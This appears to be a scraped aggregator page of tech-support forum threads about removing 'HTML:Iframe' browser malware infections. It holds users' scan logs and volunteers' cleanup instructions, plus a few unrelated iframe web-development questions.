For instructions with screenshots, please refer to the How to use Malwarebytes' Anti-Malware Guide.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drive... Read more

Read other 1 answers
RELEVANCY SCORE 38

My stepson has downloaded a virus onto my laptop.
I ran a full scan using malwarebytes, superantispyware, & avast and removed everything they found but my computer still isn't working properly.
The task manager has been remotely disabled and i can't seem to turn it back on, i cannot sytem restore, & everytime i open a new web page avast flags up as finding a virus 'HTML:Iframe.inf' as many as 5 times per page. (When I ran avast it found over 1000 of these).
I am including a hijack this log
I really need help here as I don't know what I am doing when i get beyond the basics.
Thanks in advance and here's the hijackthis log

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 23:02:02, on 02/02/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal

Running processes:
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\acs.exe
C:\Program Files\Google\Common\Goo... Read more

A:I can't get rid of HTML:Iframe-inf virus

Hello and welcome to TSF.

HijackThis is not used as the initial analysis tool in this forum.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Read other 1 answers
RELEVANCY SCORE 38

Oops! Wrong subject. I found that on my machine, not on this one.

My dear sweet son neglected to tell me he was having problems on his computer. His Yahoo massenger has suddenly begun malfunctioning throwing a scripting error in every session, refusing to close, then having to boot each session. It now will not start without a boot. He received a video link from a friend (teens, yeah) that took him to an anime site. After viewing the harmless video that came in, it began redirecting to adult videos. My husband uses this computer as well and has never run AV on it, so my son disregarded my instruction that he needed to download and install AV. Below is his HJT log file

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 11:32:26 PM, on 6/21/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlservr.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Vongo\VongoService.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Linksys Wireless-G USB Wireless Network Monitor\InfoMyCa.exe
C:\WINDOWS\system32\MsPMSPSv.exe
C:\Program Files\Java\jre1.6.0_01... Read more

A:Solved: Hijacker.IFrame.n

Read other 10 answers
RELEVANCY SCORE 38

hi, i'm developing a site that uses iframes for some of its features.
the problem is with the session variables. it seems that, if the "Always allow session cookies" form the "Advanced Privacy Settings" from IE privacy options is turned off, the session lost its id. so, the session values are lost from one page to another.
i'm trying to override that setting for this site only. someone knows how?
maybe some protocol or certificate, i don't know.
the use of iframes is out of discussion.

Read other answers
RELEVANCY SCORE 38

Offending site recorded it is hxttp://www.visitcouns.com
The HTMLIframe-inf is a bad one and only blockers are available from your
antvirus program if they have made one! Ruining everyones internet experience and jumping on legitimate sites. It's tragic! Hardly wait for the final fix
to be in at msupdate so called patched version of firefox has not worked out
virus has mutated! Times for most likely attacks in North America are early
morning. Any help would be appreciated.

A:re:iframe drive by virus

Yeah it's mr-toad again with something to add re:the iframe threat.
If you signed up for a my space account and didn't make it private you
should have. I didn't and paid the price. I suspect that it all stemmed from
there finally got pissed off dismantled the site, after making it private! Closed the account; it's now early morning and no attacks thus far. If you use IMs keep your contacts only for people you really!!!! know. I trashed my IMs because there a royal pain in the butt. I'll be keeping up to date with a thumbs up or thumbs down. Hope this helps someone.


They call me mr-toad. cheers everyone

Read other 2 answers
RELEVANCY SCORE 38

My kids were on a MySpace page watching videos the other night and now if I try to go online for anything my avast software goes nuts and I get the line in the title. it says it is in the temp. internet files folder. I shut the computer down and let avast do a complete scan and I ran spybaster and AVG. All to no avail. S I come once again to the great guys and gals here at tech support for help. I also have a strange thing happen when I try to move a file, it moves but also brings up a box from Easy CD Creator and wants me to put in the CD to install. I don't even use that program. Weird. Below I have inclosed the files you asked for (DDS & Attach & GMER). Any help would be greatly appreciated.

GMER 1.0.15.14972 - http://www.gmer.net
Rootkit scan 2009-07-09 20:22:20
Windows 5.1.2600 Service Pack 2


---- Kernel code sections - GMER 1.0.15 ----

? srescan.sys The system cannot find the file specified. !
? System32\DRIVERS\AvgAsCln.sys The system cannot find the path specified. !
? C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.sys The system cannot find the file specified. !

---- User code sections - GMER 1.0.15 ----

.text C:\WINDOWS\system32\NOTE... Read more

A:Infected with hxxp:IFrame-HW[Trj]

Hello -

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Before beginning the fix, read this post completely. If there's anything that you do not understand, kindly ask your questions before proceeding. Ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this webpage would not be available when you're carrying out the fix.

It is IMPORTANT that you don't miss a step & perform everything in the correct order/sequence.

---------------------------------------------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Stay with me until given the 'all clear' even if symptoms diminish. Lack of symptoms does not always mean the job is complete.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by me or another helper at this forum.

---------------------------------------------------------------------------------------------

Download ComboFix from this location:

Link 1

* IMPORTANT !!! Place combofix.exe on your Desktop
Disable your AntiVirus and AntiSpyware applications, usually via a right click on the Sy... Read more

Read other 19 answers
RELEVANCY SCORE 38

I have Exploit-IFrame trojan on my machine.
I only enocunter it when going to my own websites.
McAfee finds it and deletes it and shows me its location, I follow it and do not see the offending trojan, and the suffix changes each time it is found and cleaned both on the AOL and I.E. browsers.
I have run Ad-Aware SE Personal, AVG 7.5, and a complete McAfee scan - nothing found.

Step 1. None of the Malware listed, or Rogue programs exist on this machine.

Step 2. Run Panda ActiveScan.

Step 3. Downloaded and Installed Spyware Blaster from Desktop.

Step 4. I have SP 1 and 2 installed already.

Step 5. Downloaded Deckard's Systen Scanner to Desktop

Panda Activescan

Incident Status Location

Adware:adware/ncase Not disinfected c:\temp\FLEOK
Adware:adware/sidesearch ... Read more

A:Exploit-IFrame trojan

dss.exe encountered a problem and had to close

Read other 2 answers
RELEVANCY SCORE 38

I just discovered an issue with the 64bit version of internet explorer. When loading a PDF in a iframe it won't load but rather it will download in a separate acrobat reader window. I suspect this has something to do with the browser operating in 64bit and adobe being a 32bit application. You can simply avoid the problem by opening the 32 bit version of the browser from "C:\Program Files (x86)\Internet Explorer\iexplore.exe". We place a shortcut to the browser that loads an internal intranet site and I recently discovered this. Hopefully this info will help someone else out.

Read other answers
RELEVANCY SCORE 38

Hi, thanks for being there!

My system is xp sp-2. Followed all instructions. Scan logs follow.

Thanks again for your help!

Regards, Bfree

Deckard's System Scanner v20070809.63
Run by afriscribe on 2007-08-17 at 01:49:17
Computer is in Normal Mode.
--------------------------------------------------------------------------------

Total Physical Memory: 480 MiB (512 MiB recommended).


-- HijackThis (run as afriscribe.exe) ------------------------------------------

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:52:21 AM, on 8/17/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\a-squared Free\a2service.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\ewido anti-spyware 4.0\guard.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Microsoft ActiveSync\wcescomm.exe
C:\Program Files\Adobe\Adobe Acrobat 6.0\Distillr\acrotray.exe
C:\Program Files\Qlock\qlock.exe
C:\PROGRA~1\MICROS~3\rapimgr.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\Explorer.EXE... Read more

A:Hacktool:Exploit/iFrame etc

Hello, and welcome to the HijackThis Help Forum.

Apologies for any delay in replying, but we have been rather busy lately. You may wish to Subscribe to this thread so that you are notified when you receive a reply. To do this click Thread Tools (above the first post), then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Please let me know if you still need help and I will assist you. I am subscribed to this thread so I will see any reply you make.

While you are waiting for my reply, you may also want to read "Who is Helping you?", which will help you understand where we go from here.

Thank you.

Read other 1 answers
RELEVANCY SCORE 38

I'm using a little javascript to create iframes, resize them and append them to divs on a page. I got it working in FF and in IE6 and 8 but today for some reason, the iframe loads in IE6, but the javascript in the iframed file doesn't run. The iframed files open/run fine when their url's are clicked in the directory where they are located.
I was monkeying around with a script that resizes cross domain content, but
I undid any changes I made before this happened and as far as I know I didn't change anything else that would affect this.
You can see the test page here-the iframed files are on the same domain:
http://webbrewers.com/recentposts.aspx
In FF, the comments boxes open onload and their contained script runs , in IE6 the boxes open but the script hangs at the opening statement.
Just wondering if anyone else has come across this or can throw any light on it?

A:[SOLVED] IE6 odd iframe behavior

Well, that's embarassing! I didn't make any changes to security settings (I swear), but when I just set them to "low", IE6 works again. I had specifically checked earlier to make sure the settings that allows scripts to run in iframes was enabled and it was. So not sure why, but seems to be okay now.

Read other 1 answers
RELEVANCY SCORE 38

anyone know what line of code will give me the width and height of an inline frame? please help thanks I want to make something size with the screen but can't.
 

A:detecting IFRAME size

Read other 8 answers
RELEVANCY SCORE 38

It would appear that I have this virus, however ESET won't get rid of it. I've run through a full ESET scan and a comboxfix scan to get the logs, but it remains. Here is the comboxfix log (I know I was supposed to wait, but I didn't, so here it is)---Any help you can provide would be much appreciated

ComboFix 12-03-07.05 - jeffrey 03/07/2012 12:02:41.9.4 - x64
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3891.1855 [GMT -5:00]
Running from: c:\users\jeffrey\Downloads\ComboFix.exe
AV: ESET NOD32 Antivirus 4.0 *Disabled/Updated* {CB0F8167-5331-BA19-698E-64816B6801A5}
SP: ESET NOD32 Antivirus 4.0 *Disabled/Updated* {706E6083-750B-B597-533E-5FF310EF4B18}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2012-02-07 to 2012-03-07 )))))))))))))))))))))))))))))))
.
.
2012-03-07 17:10 . 2012-03-07 17:10 -------- d-----w- c:\users\Public\AppData\Local\temp
2012-03-07 17:10 . 2012-03-07 17:10 -------- d-----w- c:\users\Default\AppData\Local\temp
2012-03-07 09:05 . 2012-03-07 09:05 69000 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{482AB6A2-8D49-42D9-8C76-E616CD14062A}\offreg.dll
2012-03-06 15:36 . 2012-02-08 07:13 8643640 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{482AB6A2-8D49-42D9-8C76-E616CD14062A}&... Read more

A:html/iframe.B.Gen virus

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.===Your ComboFix log is clean.The type of infection you are seeing could have been incorporated in a all your .htm or. html files.You probably got this type of error message.http://www.wilderssecurity.com/attachment.php?attachmentid=212754&stc=1&d=1254737545Open the file with notepad copy the content and post it here for my review.You should also send the report to ESET for there review.

Read other 2 answers
RELEVANCY SCORE 38

I am using an iframe for calling other websites. I want to disable right click in this Iframe. Can anybody help me out in this.
 

A:Help! To disable right click in Iframe

It'll only work for people using IE and I think you'd have to disable it for the whole page and not just the iframe. Plus the IE user would have to have Javascript turned on for it to even work.

Other browsers have options to block you from doing evil stuff like that.

Also, keep in mind that for security reasons, browsers are very picky with what you can do with an iframe if the site loaded in it is not on the same server/domain as the page.
 

Read other 1 answers
RELEVANCY SCORE 38

I am using windows XP SP3 with ESET NOD v 4.0.437.0 and firefox 3.5.19

When I access some websites lately ESET NOD reports some viral activity and blocks access to a third party web address. The problem is repeatable on a these websites then seems to go away after a day or two and a similar problem may occur when accessing a different website.

One example of the threat warning is:

Object:
http://jclao.com/archives/1283

Threat:
HTML:Iframe.B.Gen virus
Connection terminated - quarantined

A second message then appeared:

Address has been blocked:
"www.jdbbank.com/gadgets/gadgets.php"
IP address:
61.19.241.97:80

The website owners claimed they have checked their site with several checkers and found no virus. although jdbbank did have a legitimate link on their site.

I later got a simialr message from a completely unrelated site (cme.com) so I became suspicious that my computer may have some malware. That access reported activity by the Kryptic.E trojan, but I did not manage to copy the full details.

I ran a full scan with ESET NOD32, but found nothing.

I ran the steps in your prep guide. The DDS log is pasted below.

The attach.txt and GMER log files are attached.

Note the GMER log took nearly 12 hours to complete.

.
DDS (Ver_11-03-05.01) - NTFSx86
Run by Nick at 18:19:06.98 on Thu 05/05/2011
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_23
Microsoft Windows XP Professional 5.1.2600.3.1252.61.1033.18.1526.524 [GMT 7:00]
.
AV: ESET NOD32 Antiv... Read more

A:Iframe.B.Gen and or Kryptik.E virus

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

Read other 18 answers
RELEVANCY SCORE 38

Hi Guys,

I've been suspecting that someone or something has hacked my computer, so I did a system scan with panda activescan and this has confirmed my suspicions. Its seems these files are located in Outlook 2000.

I've been suspicious about this for a few weeks but last night when some of my clients were receiving email failed notices when trying to send me emails - one of them asked if I was using a blackberry phone and whether my emails were being redirected to this phone, to which I answered "no". Therefore it appears that what ever hacker tool is lurking in Outlook could be redirecting my emails to someone else. This is only my assumption and I would like someone to confirm if this is in fact correct.

Can someone help to remove all the hacking tools in Outlook 2000, and also the spyware that activescan has picked up.

I have attached the results of activescan and also a hijackthis log file. Both are attached in notepad.

Thanks.

Kind Regards,
Brian
 

A:Hacktool:Exploit/iFrame

Read other 14 answers
RELEVANCY SCORE 38

Problem: A couple months ago I some how got some malware on my mac at work (I don't know how because I don't go to "the sites you should stay away from", so I am guessing it was probably from some stupid ad banner. ANYWAY, when I logged into our website via FTP, a week later I noticed our website was blocked by Google (a client actually called us to tell us) and so I looked around to find the malicious script hidden iframe. The problem is it doesn't affect my mac. I'm getting tired of removing the script from our website every other week not to mention I have no idea what the affects are on a mac and don't want to compromise other peoples computers.

FTP Software: FireFTP
Mac OS: 10.4
Software tried: MacScan (did not detect any malware)

I am trying to take care of this without involving any money and unfortanately there isn't much "free" Software out there for Macs or scanners.

Anyone know how to remove this? I am having the FTP passwords changed but I do not want to log back into the FTP only to have it happen all over again and then have to change our FTP passwords again.

Please help!
Thank you.

A:Mac and the iframe malicious script

You might have to wait awhile for a reply
I'm going to bring this to the attention of some people who should know
Hang in there

Read other 2 answers
RELEVANCY SCORE 38

Please help.. have Iframe.gs a script virus type of problem..all my htm file etc have been hit..can not seem to stop it spreading...malware-by does not see it ...bitdefender can not disinfect or quarantine ..so I have to delete..leave program currupted..help please

A:Iframe script/virus

Hi and welcome. Can we get a log from MBAM?run MBAM (MalwareBytes):Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so plea... Read more

Read other 1 answers
RELEVANCY SCORE 38

i need help with this virus Thanks

html/iframe.B.Gen virus

this virus is on my laptop

im running vista 64 bit

A:i need help with this html/iframe.B.Gen virus

Welcome aboard Download Security Check from HERE, and save it to your Desktop. * Double-click SecurityCheck.exe * Follow the onscreen instructions inside of the black box. * A Notepad document should open automatically called checkup.txt; please post the contents of that document.=============================================================================Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.Make sure the following options are checked:
Internet ServicesWindows FirewallSystem RestoreSecurity Center/Action CenterWindows UpdatePress "Scan".It will create a log (FSS.txt) in the same directory the tool is run.Please copy and paste the log to your reply.====================================================================================Please download MiniToolBox and run it.Checkmark following boxes:Report IE Proxy SettingsReport FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Devices (do NOT change any settings here)List Users, Partitions and Memory sizeClick Go and post the result.=============================================================================Download Malwarebytes' Anti-Malware (aka MBAM): http://www.malwarebytes.org/products/malwarebytes_free to your desktop. * Double-click mbam-setup.exe and follow the prompts to install the program. * At the end, be sure a checkmark is placed next to Update Malware... Read more

Read other 10 answers
RELEVANCY SCORE 38

I have run eset online scanner tool and it identifies problem as HTML/Iframe.B.Gen virus and JS/Exploit.Agent.NHC trojan.  The eset tool never completes its scan.  I have run Malwarebyte's and Rogue Killer.  Each removed some other malware but repeating those scans don't find anything now.  PC is very slow.  I have attempted to run CCleaner and it never completes it's analysis when scanning for temporary Internet files.  This is an office PC.  QS1 and Integra/Docutrack are legit applications.
 
Thanks for any help provided. 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 8.0.7601.17514
Run by NSSUser at 8:48:44 on 2014-08-07
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3998.1045 [GMT -4:00]
.
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\mfevtps.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\ctfmon.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Program Files (x86)\Task Killer\TaskKil... Read more

A:HTML/Iframe.B.Gen virus

Hi there,my name is Marius and I will assist you with your malware related problems.Before we move on, please read the following points carefully. First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding. Perform everything in the correct order. Sometimes one step requires the previous one. If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem. Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me. Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts. If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed. Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean. My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.  Please upload attach.txt as well and do the following:   Scan with Gmer rootkit scannerPlease download Gmer from here by clicking on the "Download EXE" Button.Double click on the randomly named GMER.exe. If asked to allow gmer.sys driver to load, please consent.If it giv... Read more

Read other 16 answers